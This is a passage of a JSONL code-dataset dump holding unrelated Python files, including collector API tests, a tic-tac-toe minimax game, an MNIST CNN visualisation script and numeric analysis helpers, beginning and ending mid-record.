(self.STATE[\"q2\"], self.STATE[\"q3\"]):\n if c.isdigit():\n self.to_q3(c)\n else:\n self.to_q4()\n \n def get_state(self) -> int:\n return self.curr_state\n \n def get_val(self) -> int:\n return self.sign * self.val\n\nclass Solution:\n def myAtoi(self, s: str) -> int:\n sm = StateMachine()\n for c in s:\n sm.push_char(c)\n if sm.get_state() == sm.STATE[\"q4\"]:\n \n break\n return sm.get_val()","sub_path":"problems/string_to_integer_(atoi)/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"270758229","text":"# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom flask import json\nfrom mock import patch\n\nfrom collector.test.base import DbTest\n\nfrom collector.api.app import db\nfrom collector.api.common import consts\nfrom collector.api.db.model import ActionLog\nfrom six.moves import xrange\n\n\nclass TestActionLogs(DbTest):\n\n def test_not_allowed_methods(self):\n resp = self.get('/api/v1/action_logs/', None)\n self.check_response_error(resp, 405)\n resp = self.delete('/api/v1/action_logs/')\n self.check_response_error(resp, 405)\n resp = self.patch('/api/v1/action_logs/', None)\n self.check_response_error(resp, 405)\n resp = self.put('/api/v1/action_logs/', None)\n self.check_response_error(resp, 405)\n\n def test_empty_action_logs_post(self):\n resp = self.post('/api/v1/action_logs/', {'action_logs': []})\n self.check_response_ok(resp)\n\n def test_post(self):\n master_node_uid = 'x'\n expected_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"\",\n \"action_name\": \"\",\n \"action_type\": \"http_request\",\n \"start_timestamp\": \"\",\n \"end_timestamp\": \"\",\n \"additional_info\": {\n \"request_data\": {},\n \"response_data\": {}\n },\n \"is_sent\": False,\n \"cluster_id\": 5,\n \"task_uuid\": None\n }\n }\n for i in xrange(3)]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': expected_logs}\n )\n self.check_response_ok(resp)\n resp_data = json.loads(resp.data)\n for d in resp_data['action_logs']:\n self.assertEqual(\n consts.ACTION_LOG_STATUSES.added,\n d['status']\n )\n\n actual_logs = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid).all()\n self.assertEqual(len(expected_logs), len(actual_logs))\n self.assertListEqual(\n sorted([l['external_id'] for l in expected_logs]),\n sorted([l.external_id for l in actual_logs])\n )\n\n def test_post_duplication(self):\n master_node_uid = 'x'\n action_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"\",\n \"action_name\": \"\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"1\",\n \"end_timestamp\": \"2\",\n \"additional_info\": {\n \"parent_task_id\": 0,\n \"subtasks_ids\": [],\n \"operation\": \"\",\n \"nodes_from_resp\": [],\n \"ended_with_status\": \"\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5,\n \"task_uuid\": None\n }\n }\n for i in xrange(100)]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs}\n )\n self.check_response_ok(resp)\n count_actual = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid).count()\n resp_data = json.loads(resp.data)\n for d in resp_data['action_logs']:\n self.assertEqual(\n consts.ACTION_LOG_STATUSES.added,\n d['status']\n )\n self.assertEqual(len(action_logs), count_actual)\n\n # Checking duplications is not added\n new_action_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"\",\n \"action_name\": \"\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"3\",\n \"end_timestamp\": \"4\",\n \"additional_info\": {\n \"parent_task_id\": 0,\n \"subtasks_ids\": [],\n \"operation\": \"\",\n \"nodes_from_resp\": [],\n \"ended_with_status\": \"\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5,\n \"task_uuid\": None\n }\n }\n for i in xrange(len(action_logs) + 
50)]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs + new_action_logs}\n )\n self.check_response_ok(resp)\n count_actual = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid).count()\n self.assertEqual(\n len(new_action_logs),\n count_actual\n )\n data = json.loads(resp.data)\n existed = filter(\n lambda x: x['status'] == consts.ACTION_LOG_STATUSES.existed,\n data['action_logs']\n )\n added = filter(\n lambda x: x['status'] == consts.ACTION_LOG_STATUSES.added,\n data['action_logs']\n )\n self.assertEqual(len(action_logs), len(existed))\n self.assertEqual(len(new_action_logs) - len(action_logs), len(added))\n\n def test_validation_error(self):\n expected_logs = [{'master_node_uid': 'x', 'external_id': None}]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': expected_logs}\n )\n self.check_response_error(resp, code=400)\n\n def test_incomplete_tasks(self):\n master_node_uid = 'x'\n action_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"cluster_changes\",\n \"action_name\": \"deployment\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"1\",\n # about 1/3 is incomplete\n \"end_timestamp\": \"2\" if i % 3 else None,\n \"additional_info\": {\n \"parent_task_id\": i if i % 2 else None,\n \"subtasks_ids\": [],\n \"operation\": \"deployment\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5\n }\n }\n for i in xrange(100)]\n completed_count = sum(rec[\"body\"][\"end_timestamp\"] is not None\n for rec in action_logs)\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs}\n )\n self.check_response_ok(resp)\n\n log_recs = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid)\n self.assertEqual(\n log_recs.count(),\n completed_count\n )\n for rec in log_recs:\n self.assertIsNotNone(rec.body[\"end_timestamp\"])\n\n resp_logs = json.loads(resp.data)['action_logs']\n self.assertEqual(\n len(resp_logs),\n len(action_logs)\n )\n passed = sum(r['status'] == consts.ACTION_LOG_STATUSES.added\n for r in resp_logs)\n skipped = sum(r['status'] == consts.ACTION_LOG_STATUSES.skipped\n for r in resp_logs)\n self.assertEqual(\n passed + skipped,\n len(action_logs)\n )\n self.assertEqual(\n passed,\n completed_count\n )\n\n def test_failed_action_logs(self):\n al_num = 100\n action_logs = [\n {\n 'master_node_uid': 'xx',\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"cluster_changes\",\n \"action_name\": \"deployment\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"1\",\n \"end_timestamp\": \"2\",\n \"additional_info\": {\n \"parent_task_id\": None,\n \"subtasks_ids\": [],\n \"operation\": \"deployment\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5\n }\n }\n for i in xrange(al_num)]\n with patch.object(ActionLog.__table__, 'insert',\n side_effect=Exception('stop')):\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs}\n )\n self.check_response_ok(resp)\n\n resp_logs = json.loads(resp.data)['action_logs']\n for r in resp_logs:\n self.assertEqual(consts.ACTION_LOG_STATUSES.failed,\n r['status'])\n\n def test_action_type_action_name_copied_to_columns(self):\n action_logs_data = [\n {\n 'master_node_uid': 'xx',\n 'external_id': 1,\n 'body': {\n 'id': 1,\n 'action_name': 'deployment',\n 'action_type': 'nailgun_task',\n 'end_timestamp': None\n }\n },\n {\n 'master_node_uid': 'xx',\n 'external_id': 2,\n 'body': {\n 
'id': 2,\n                    'action_name': '',\n                    'action_type': 'http_request',\n                    'end_timestamp': \"1\"\n                }\n            }\n        ]\n        resp = self.post(\n            '/api/v1/action_logs/',\n            {'action_logs': action_logs_data}\n        )\n        self.check_response_ok(resp)\n\n        action_logs = db.session.query(ActionLog).all()\n        for action_log in action_logs:\n            self.assertEqual(action_log.action_name,\n                             action_log.body['action_name'])\n            self.assertEqual(action_log.action_type,\n                             action_log.body['action_type'])\n","sub_path":"collector/collector/test/resources/test_action_logs.py","file_name":"test_action_logs.py","file_ext":"py","file_size_in_byte":11202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"339117277","text":"import numpy as np\nimport qiskit as qk\nfrom copy import deepcopy\nfrom tqdm.notebook import tqdm\nfrom neuralnetwork import *\nfrom utils import *\n\n\nclass FIM():\n    def __init__(self, model):\n        self.model = model\n        self.fim = None\n\n    def fit(self, x):\n        n_samples = x.shape[0]\n\n        self.model.backward(x, samplewise=True, include_loss=False)\n        gradient = self.model.weight_gradient_list\n\n        gradient_flattened = []\n        for grad in gradient:\n            gradient_flattened.append(grad.reshape(n_samples, -1))\n\n        gradient_flattened = np.concatenate(gradient_flattened, axis=1)\n\n        self.fim = 1 / n_samples * gradient_flattened.T @ gradient_flattened\n\n    def eigen(self, sort=False):\n        # use a local name so the bound method is not shadowed by its result\n        eigenvalues = np.linalg.eig(self.fim)[0]\n        if sort:\n            eigenvalues[::-1].sort()\n        return np.abs(eigenvalues)\n\n    def fisher_rao(self):\n        weight = self.model.weight\n\n        weight_flattened = []\n        for w in weight:\n            weight_flattened.append(w.reshape(-1, 1))\n\n        weight = np.concatenate(weight_flattened, axis=0)\n\n        fr = weight.T @ self.fim @ weight\n\n        return fr[0][0]\n\n\ndef trajectory_length(x):\n    diff = (x[1:] - x[:-1])\n    diff = np.append(diff, (x[0] - x[-1]).reshape(1, -1), axis=0)\n    accum = np.sum(diff**2, axis=1)\n    accum = np.sum(np.sqrt(accum))\n    return accum\n\n\ndef trajectory_curvature(x):\n    diff = (x[1:] - x[:-1])\n    accum = np.sum(diff**2, axis=1)\n    accum = np.sum(np.sqrt(accum))\n    return accum\n","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"141938848","text":"from collections import namedtuple\n\nimport numpy as np\nfrom scipy.integrate import ode\n\nfrom helpers import pairwise\n\nArrow = namedtuple('Arrow', ['x', 'y', 'len_x', 'len_y'])\n\n\ndef get_plot_arrows(xs, ys, n=3):\n    length = 0\n    for (prev_x, prev_y), (x, y) in pairwise(zip(xs, ys)):\n        length += np.sqrt((x - prev_x) ** 2 + (y - prev_y) ** 2)\n    distance, i, arrows = 0, 1, []\n    for (prev_x, prev_y), (x, y) in pairwise(zip(xs, ys)):\n        distance += np.sqrt((x - prev_x) ** 2 + (y - prev_y) ** 2)\n        if distance > i * length / n:\n            arrows.append(Arrow(prev_x, prev_y, x - prev_x, y - prev_y))\n            i += 1\n    return arrows\n\n\ndef trajectory(x0, derivative, bounds=lambda x: True, time=100, reverse=False):\n    solver = ode(derivative).set_integrator('zvode', method='bdf')\n    solver.set_initial_value(x0, 0)\n    dt, points = 0.01, [x0]\n    while solver.successful() and abs(solver.t) < time:\n        point = solver.integrate(solver.t + dt if not reverse else solver.t - dt)\n        points.append(np.real(point))\n        if not bounds(point):\n            break\n    if reverse:\n        points.reverse()\n    return 
points\n","sub_path":"TS/lapunow2/phase_portraits.py","file_name":"phase_portraits.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228412118","text":"# -*- coding: utf-8 -*-\n'''\nГенерация датасета и сохранение его в файлах, чтобы запускать модели, написанные на других ЯП.\n(c) Козиев Илья inkoziev@gmail.com\n'''\n\nfrom __future__ import print_function\nimport sklearn.model_selection\nimport numpy as np\nfrom DatasetVectorizers import W2V_Vectorizer\nfrom DatasetVectorizers import WordIndeces_Vectorizer\n\n\n\ndataset_generator = W2V_Vectorizer()\n#dataset_generator = WordIndeces_Vectorizer()\nX_data,y_data = dataset_generator.vectorize_dataset()\n\nX_train, X_val0, y_train, y_val0 = sklearn.model_selection.train_test_split(X_data, y_data, test_size=0.66,\n random_state=123456)\n\nX_holdout, X_val, y_holdout, y_val = sklearn.model_selection.train_test_split(X_val0, y_val0, test_size=0.50,\n random_state=123456)\n\nprint('X_train.shape={} X_val.shape={} X_holdout.shape={}'.format(X_train.shape, X_val.shape, X_holdout.shape))\n\n\n# --------------------------------------------------------------------\n# Датасеты для OpenNN, в которых X и y совмещены в одном файле\nnx = X_train.shape[1]\nnrow = 10000000\nx_header = str.join( '\\t', [ 'x{}'.format(i) for i in range(nx) ] )+'\\ty'\nXy_train = np.hstack( (X_train, y_train.reshape( (y_train.shape[0],1) ) ) )[:nrow,:]\n#np.savetxt( '../data/Xy_train.csv', Xy_train, fmt='%.18e', delimiter='\\t', header=x_header, comments='')\nnp.savetxt( '../data/Xy_train.csv', Xy_train, fmt='%g', delimiter='\\t', header='', comments='')\n\nXy_val = np.hstack( (X_val, y_val.reshape( (y_val.shape[0],1) ) ) )[:nrow,:]\n#np.savetxt( '../data/Xy_val.csv', Xy_val, fmt='%.18e', delimiter='\\t', header=x_header, comments='')\nnp.savetxt( '../data/Xy_val.csv', Xy_val, fmt='%g', delimiter='\\t', header='', comments='')\n\nXy_holdout = np.hstack( (X_holdout, y_holdout.reshape( (y_holdout.shape[0],1) ) ) )[:nrow,:]\n#np.savetxt( '../data/Xy_holdout.csv', Xy_holdout, fmt='%.18e', delimiter='\\t', header=x_header, comments='')\nnp.savetxt( '../data/Xy_holdout.csv', Xy_holdout, fmt='%g', delimiter='\\t', header='', comments='')\n\n# --------------------------------------------------------------------\n\nnp.savetxt( '../data/X_train.csv', X_train, fmt='%.18e', delimiter='\\t')\nnp.savetxt( '../data/y_train.csv', y_train, fmt='%.18e', delimiter='\\t')\n\nnp.savetxt( '../data/X_val.csv', X_val, fmt='%.18e', delimiter='\\t')\nnp.savetxt( '../data/y_val.csv', y_val, fmt='%.18e', delimiter='\\t')\n\nnp.savetxt( '../data/X_holdout.csv', X_holdout, fmt='%.18e', delimiter='\\t')\nnp.savetxt( '../data/y_holdout.csv', y_holdout, fmt='%.18e', delimiter='\\t')\n","sub_path":"PyModels/store_dataset_file.py","file_name":"store_dataset_file.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230159874","text":"# pylint: disable=missing-module-docstring\r\n# pylint: disable=missing-class-docstring\r\n# pylint: disable=missing-function-docstring\r\nBOT = 'O'\r\nHUMAN = 'X'\r\nBLANK = ' '\r\n\r\n\r\ndef d2_to_number(num_a, num_b):\r\n result = 999\r\n if num_a == 0 and num_b == 0:\r\n result = 1\r\n elif num_a == 0 and num_b == 1:\r\n result = 2\r\n elif num_a == 0 and num_b == 2:\r\n result = 3\r\n elif num_a == 1 and num_b == 0:\r\n result = 4\r\n elif num_a == 1 and num_b == 1:\r\n result = 5\r\n 
elif num_a == 1 and num_b == 2:\r\n result = 6\r\n elif num_a == 2 and num_b == 0:\r\n result = 7\r\n elif num_a == 2 and num_b == 1:\r\n result = 8\r\n elif num_a == 2 and num_b == 2:\r\n result = 9\r\n\r\n return result\r\n\r\n\r\ndef display_board(d2_board):\r\n blank_board = \"\"\"\r\n___________________\r\n| 1 | 2 | 3 |\r\n|-----------------|\r\n| 4 | 5 | 6 |\r\n|-----------------|\r\n| 7 | 8 | 9 |\r\n|-----------------|\r\n\"\"\"\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n pos_number = d2_to_number(pos_x, pos_y)\r\n if d2_board[pos_x][pos_y] == 'O' or d2_board[pos_x][pos_y] == 'X':\r\n blank_board = blank_board.replace(str(pos_number), d2_board[pos_x][pos_y])\r\n else:\r\n blank_board = blank_board.replace(str(pos_number), ' ')\r\n print(blank_board)\r\n\r\n\r\ndef number_y(num_c):\r\n result = 99\r\n if num_c % 3 == 1:\r\n result = 0\r\n if num_c % 3 == 2:\r\n result = 1\r\n if num_c % 3 == 0:\r\n result = 2\r\n return result\r\n\r\n\r\ndef number_x(num_c):\r\n if num_c <= 3:\r\n return 0\r\n if num_c >= 7:\r\n return 2\r\n return 1\r\n\r\n\r\ndef player_input(correct_fields):\r\n while True:\r\n print(\"dostepne pola: \")\r\n print(correct_fields)\r\n try:\r\n console_input = input(\"Wprowadź numer pola: \")\r\n console_input = int(console_input)\r\n if console_input not in correct_fields:\r\n print(correct_fields)\r\n print(\"Błędny numer pola, ponów próbę\")\r\n else:\r\n break\r\n except ValueError:\r\n print(correct_fields)\r\n print(\"Podaj pole jako numer pola, ponów próbę\")\r\n return console_input\r\n\r\n\r\ndef computer_turn():\r\n best_score = -1000\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2Board[pos_x][pos_y] == BLANK:\r\n # u can move here\r\n d2Board[pos_x][pos_y] = BOT\r\n score = min_max_algorithm(d2Board, False)\r\n d2Board[pos_x][pos_y] = BLANK\r\n if score > best_score:\r\n best_score = score\r\n best_move_x = pos_x\r\n best_move_y = pos_y\r\n d2Board[best_move_x][best_move_y] = BOT\r\n\r\n\r\ndef trying_max():\r\n best_score = -1000\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2Board[pos_x][pos_y] == BLANK:\r\n d2Board[pos_x][pos_y] = BOT\r\n score = min_max_algorithm(d2Board, False)\r\n d2Board[pos_x][pos_y] = BLANK\r\n if score > best_score:\r\n best_score = score\r\n return best_score\r\n\r\n\r\ndef trying_min():\r\n best_score = 1000\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2Board[pos_x][pos_y] == BLANK:\r\n d2Board[pos_x][pos_y] = HUMAN\r\n score = min_max_algorithm(d2Board, True)\r\n d2Board[pos_x][pos_y] = BLANK\r\n if score < best_score:\r\n best_score = score\r\n return best_score\r\n\r\n\r\ndef min_max_algorithm(board, is_maximazing):\r\n result = 999\r\n if if_mark_won(BOT):\r\n result = 100\r\n elif if_mark_won(HUMAN):\r\n result = -100\r\n elif check_draw(board):\r\n result = 0\r\n elif is_maximazing:\r\n result = trying_max()\r\n # best_score = -1000\r\n # for pos_x in range(0, 3):\r\n # for pos_y in range(0, 3):\r\n # if d2Board[pos_x][pos_y] == BLANK:\r\n # d2Board[pos_x][pos_y] = BOT\r\n # score = min_max_algorithm(board, False)\r\n # d2Board[pos_x][pos_y] = BLANK\r\n # if score > best_score:\r\n # best_score = score\r\n # result = best_score\r\n # minimizing\r\n elif not is_maximazing:\r\n result = trying_min()\r\n # best_score = 1000\r\n # for pos_x in range(0, 3):\r\n # for pos_y in range(0, 3):\r\n # if d2Board[pos_x][pos_y] == BLANK:\r\n # d2Board[pos_x][pos_y] = HUMAN\r\n # score = min_max_algorithm(board, True)\r\n # d2Board[pos_x][pos_y] = 
BLANK\r\n # if score < best_score:\r\n # best_score = score\r\n #result = best_score\r\n return result\r\n\r\n\r\ndef check_draw(d2_board):\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2_board[pos_x][pos_y] == BLANK:\r\n return False\r\n return True\r\n\r\n\r\ndef if_mark_won(mark):\r\n symbol = 'X'\r\n for pos_x in range(0, 3):\r\n # sprwadz piony\r\n if d2Board[pos_x][0] == d2Board[pos_x][1] and d2Board[pos_x][1] == d2Board[pos_x][2]:\r\n symbol = d2Board[pos_x][0]\r\n if symbol == mark:\r\n return True\r\n # sprawdz poziomy\r\n if d2Board[0][pos_x] == d2Board[1][pos_x] and d2Board[1][pos_x] == d2Board[2][pos_x]:\r\n symbol = d2Board[0][pos_x]\r\n if symbol == mark:\r\n return True\r\n # sprawdz skosy\r\n if d2Board[0][0] == d2Board[1][1] and d2Board[1][1] == d2Board[2][2]:\r\n symbol = d2Board[0][0]\r\n if symbol == mark:\r\n return True\r\n if d2Board[2][0] == d2Board[1][1] and d2Board[1][1] == d2Board[0][2]:\r\n symbol = d2Board[2][0]\r\n if symbol == mark:\r\n return True\r\n return False\r\n\r\n\r\ndef check_end(d2_board):\r\n # sprwadz\r\n symbol = 'X'\r\n for pos_x in range(0, 3):\r\n # sprwadz piony\r\n if d2_board[pos_x][0] == d2_board[pos_x][1] and d2_board[pos_x][1] == d2_board[pos_x][2]:\r\n symbol = d2_board[pos_x][0]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał1 ' + str(symbol))\r\n return True\r\n # sprawdz poziomy\r\n if d2_board[0][pos_x] == d2_board[1][pos_x] and d2_board[1][pos_x] == d2_board[2][pos_x]:\r\n symbol = d2_board[0][pos_x]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał2 ' + str(symbol))\r\n return True\r\n # sprawdz skosy\r\n if d2_board[0][0] == d2_board[1][1] and d2_board[1][1] == d2_board[2][2]:\r\n symbol = d2_board[0][0]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał3 ' + str(symbol))\r\n return True\r\n if d2_board[2][0] == d2_board[1][1] and d2_board[1][1] == d2_board[0][2]:\r\n symbol = d2_board[2][0]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał4 ' + str(symbol))\r\n return True\r\n return False\r\n\r\n\r\ndef basic_game_turn(player_turn, d2_board):\r\n if player_turn:\r\n print('Gracz X')\r\n choice = player_input(able_fields)\r\n d2_board[number_x(choice)][number_y(choice)] = 'X'\r\n else:\r\n print('Komputer O')\r\n # odkomentuj ponizsze dla 2ch graczy\r\n # choice = playerInput(avaibleFields)\r\n # d2Board[numberX(choice)][numberY(choice)] = 'O'\r\n computer_turn()\r\n\r\n list_of_globals = globals()\r\n list_of_globals['PLAYER_TURN'] = not list_of_globals['PLAYER_TURN']\r\n\r\n\r\nif __name__ == '__main__':\r\n w, h = 3, 3\r\n d2Board = [[7 for x in range(w)] for y in range(h)]\r\n for i in range(0, 3):\r\n for j in range(0, 3):\r\n d2Board[i][j] = BLANK\r\n\r\n display_board(d2Board)\r\n PLAYER_TURN = True\r\n while True:\r\n able_fields = []\r\n for i in range(0, 3):\r\n for j in range(0, 3):\r\n POS_NUMBER = d2_to_number(i, j)\r\n if not (d2Board[i][j] == 'O' or d2Board[i][j] == 'X'):\r\n # jeśli nie ma zajętego pola, możesz je zająć\r\n able_fields.append(POS_NUMBER)\r\n if if_mark_won(HUMAN):\r\n print(\"Wygrał gracz, X\")\r\n break\r\n if if_mark_won(BOT):\r\n print(\"Wygrał komputer, X\")\r\n break\r\n if len(able_fields) <= 0:\r\n print(\"End of the game\")\r\n if if_mark_won(HUMAN):\r\n print(\"Wygrał gracz, X\")\r\n break\r\n if if_mark_won(BOT):\r\n print(\"Wygrał komputer, X\")\r\n break\r\n print(\"Remis\")\r\n break\r\n basic_game_turn(PLAYER_TURN, d2Board)\r\n display_board(d2Board)\r\n # 
print(d2Board)\r\n","sub_path":"lab5tictacGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"539264779","text":"from __future__ import print_function\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets, transforms\nfrom sklearn.manifold import TSNE\n\n\nclass Net(nn.Module):\n    def __init__(self):\n        super(Net, self).__init__()\n\n        self.conv1 = nn.Conv2d(in_channels=1, out_channels=64, kernel_size=(5, 5), stride=1)\n        self.conv2 = nn.Conv2d(64, 64, 3, 1)\n        self.conv3 = nn.Conv2d(64, 128, 3, 1)\n        self.bn1 = nn.BatchNorm2d(64)\n        self.bn2 = nn.BatchNorm2d(64)\n        self.bn3 = nn.BatchNorm2d(128)\n        self.dropout1 = nn.Dropout2d(0.4)\n        self.dropout2 = nn.Dropout2d(0.3)\n        self.dropout3 = nn.Dropout2d(0.2)\n        self.fc1 = nn.Linear(128 * 9, 256)\n        self.fc2 = nn.Linear(256, 10)\n\n\n    def forward(self, x, get_features=True):\n        x = self.conv1(x)\n        x = F.relu(x)\n        x = F.max_pool2d(x, 2)\n        x = self.dropout1(self.bn1(x))\n\n        x = self.conv2(x)\n        x = F.relu(x)\n        x = F.max_pool2d(x, 2)\n        x = self.dropout2(self.bn2(x))\n\n        x = self.conv3(x)\n        x = F.relu(x)\n        x = self.dropout3(self.bn3(x))\n\n        x = torch.flatten(x, 1)\n        feat = self.fc1(x)\n\n        x = F.relu(feat)\n        x = self.fc2(x)\n\n        output = F.log_softmax(x, dim=1)\n        return output, feat\n\n\nif __name__ == '__main__':\n    model = Net()\n    model.load_state_dict(torch.load('mnist_model_full.pt'))\n\n    test_dataset = datasets.MNIST('../data', train=False,\n                          transform=transforms.Compose([\n                              transforms.ToTensor(),\n                              transforms.Normalize((0.1307,), (0.3081,))\n                          ]))\n\n    with torch.no_grad(): # For the inference step, gradient is not computed\n        mistake_ims = []\n        mistakes = []\n        model.eval()\n        kernels = list(model.children())[0].weight.data[:9, 0]\n        confusion = np.zeros((10, 10))\n        class_counts = np.zeros(10)\n        features = np.zeros((len(test_dataset), 256))\n        targets = []\n        i = 0\n\n        for data, target in test_dataset:\n            targets.append(target)\n            # unpack the (1, 256) feature row before storing it in the array\n            output, feat = model(data.unsqueeze(0))\n            features[i] = feat[0]\n            pred = int(output.argmax(dim=1, keepdim=True)[0])\n\n            if pred != target and len(mistakes) < 9:\n                mistake_ims.append(data[0])\n                mistakes.append((pred, target))\n\n            confusion[target, pred] += 1\n            class_counts[target] += 1\n            i += 1\n\n        # feats_embedded is used by the t-SNE and neighbor plots below\n        feats_embedded = TSNE(n_components=2).fit_transform(features)\n\n        n_train = [60000 // (2 ** i) for i in [0, 1, 2, 3, 4]]\n        train_accs = [99.43, 99.40, 99.28, 99.23, 99.]\n        test_accs = [99.5, 99.44, 99.25, 99.19, 98.65]\n        plt.figure(figsize=(8, 4))\n        plt.loglog(n_train, 1 - np.array(train_accs) / 100., label='train')\n        plt.loglog(n_train, 1 - np.array(test_accs) / 100., label='test')\n        plt.xlabel('number of training examples')\n        plt.ylabel('zero-one error')\n        plt.xticks(n_train, n_train)\n        plt.yticks([0.005, 0.01, 0.015])\n        plt.legend()\n        plt.savefig('subset_training.png')\n        plt.close()\n\n        fig, axs = plt.subplots(3, 3)\n        for i, im in enumerate(mistake_ims):\n            axs[i // 3, i % 3].imshow(im, cmap='gray')\n            axs[i // 3, i % 3].axis('off')\n            axs[i // 3, i % 3].set_title(f'Pred: {mistakes[i][0]}, Actual: {mistakes[i][1]}')\n        plt.savefig('mistake_examples.png')\n        plt.close()\n\n        fig, axs = plt.subplots(3, 3)\n        for i, im in enumerate(kernels):\n            axs[i // 3, i % 3].imshow(im, cmap='gray')\n            axs[i // 3, i % 3].axis('off')\n            axs[i // 3, i % 3].set_title(f'Kernel {i + 1}')\n        plt.savefig('first_layer_kernels.png')\n        plt.close()\n\n        confusion = 
[[('%d' % p) for p in row] for row in confusion]\n fig, axs = plt.subplots(1, 1)\n axs.table(cellText=confusion, cellLoc='center', loc='center')\n axs.axis('off')\n axs.set_ylabel('True Class')\n axs.set_title('Predicted Class')\n plt.savefig('confusion_matrix.png')\n plt.close()\n\n plt.figure(figsize=(8, 8))\n colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple',\n 'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan']\n for i, c in enumerate(colors):\n fes = feats_embedded[np.where(np.array(targets) == i)]\n plt.scatter(fes[:, 0], fes[:, 1], color=colors[i], s=1, label=str(i))\n plt.legend()\n plt.savefig('tSNE.png')\n plt.close()\n\n plt.rcParams[\"font.family\"] = \"serif\"\n fig, axs = plt.subplots(4, 9)\n idxs = np.random.choice(len(test_dataset), size=4, replace=False)\n for i, idx in enumerate(idxs):\n sq_dists = np.sum((feats_embedded - feats_embedded[idx]) ** 2, axis=1)\n neighbors = np.argsort(sq_dists)[1:9]\n axs[i, 0].imshow(test_dataset[idx][0][0], cmap='gray')\n axs[i, 0].axis('off')\n for j in range(8):\n axs[i, j + 1].imshow(test_dataset[neighbors[j]][0][0], cmap='gray')\n axs[i, j + 1].axis('off')\n axs[0, 0].set_title('I_0')\n for j in range(1, 9):\n axs[0, j].set_title('I_' + str(j))\n plt.savefig('neighbors.png')\n plt.close()\n","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"460625903","text":"from config.amqp import *\nfrom config.settings import *\nfrom modules.amqp import Worker\nfrom modules.logger import Log\nfrom on_http import NodesApi as Nodes\nfrom on_http import PollersApi as Pollers\nfrom threading import Thread\nfrom datetime import datetime\nfrom proboscis.asserts import assert_equal\nfrom proboscis.asserts import assert_not_equal\nfrom proboscis.asserts import assert_false\nfrom proboscis.asserts import assert_raises\nfrom proboscis.asserts import assert_true\nfrom proboscis.asserts import assert_is_not_none\nfrom proboscis import SkipTest\nfrom proboscis import test\nfrom json import dumps,loads\n\nLOG = Log(__name__)\n\n@test(groups=['amqp.tests'])\nclass AMQPTests(object):\n\n def __init__(self):\n self.__client = config.api_client\n self.__threadTasks = []\n\n class ThreadTask(object):\n def __init__(self,worker,thread,id):\n self.id = id\n self.worker = worker\n self.thread = thread\n self.state = False\n\n def amqp_tasker_thread(self,worker,id):\n LOG.info('spawning AMQP task thread for id {0}'.format(id))\n worker.start()\n\n def 